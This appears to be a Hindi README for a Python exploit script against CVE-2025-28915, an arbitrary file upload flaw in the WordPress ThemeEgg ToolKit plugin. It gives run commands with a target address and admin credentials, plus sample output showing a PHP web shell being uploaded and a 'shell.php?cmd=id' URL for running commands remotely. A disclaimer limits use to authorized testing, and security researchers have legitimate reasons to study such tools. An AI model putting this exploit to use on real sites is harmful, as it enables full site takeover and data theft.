
WordPress ThemeEgg ToolKit प्लगइन <= 1.2.9 - मनमानी फ़ाइल अपलोड भेद्यता
ThemeEgg ToolKit प्लगइन (संस्करण ≤ 1.2.9) में एक अप्रतिबंधित फ़ाइल अपलोड कमजोरी प्रमाणित हमलावरों को सर्वर पर वेब शेल अपलोड करने की अनुमति देती है। इससे रिमोट कोड निष्पादन (RCE), पूर्ण वेबसाइट अधिग्रहण और संवेदनशील डेटा से समझौता हो सकता है।
यह स्क्रिप्ट CVE-2025-28915 के शोषण को स्वचालित करती है:
requests, beautifulsoup4pip install requests beautifulsoup4
python CVE-2025-28915.py -u http://192.168.100.74:888/wordpress -un admin -p password123
| तर्क | विवरण |
|---|---|
-u | लक्ष्य WordPress URL (जैसे, http://target.com/wordpress) |
-un | WordPress उपयोगकर्ता नाम |
-p | WordPress पासवर्ड |
[+] कमजोर संस्करण पाया गया: 1.2.9
[+] सफलतापूर्वक लॉग इन किया।
[+] सुरक्षा नॉन्स मिला: f82467a997
[*] वेब शेल अपलोड किया जा रहा है...
[+] वेब शेल सफलतापूर्वक अपलोड हुआ!
[+] संभावित वेब शेल स्थान: http://target.com/wp-content/uploads/2025/03/shell.php
[*] परीक्षण कमांड: http://target.com/wp-content/uploads/2025/03/shell.php?cmd=id
यह स्क्रिप्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है। अनधिकृत उपयोग अवैध और अनैतिक है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।
द्वारा: खालिद अलेनाज़ी (Nxploit)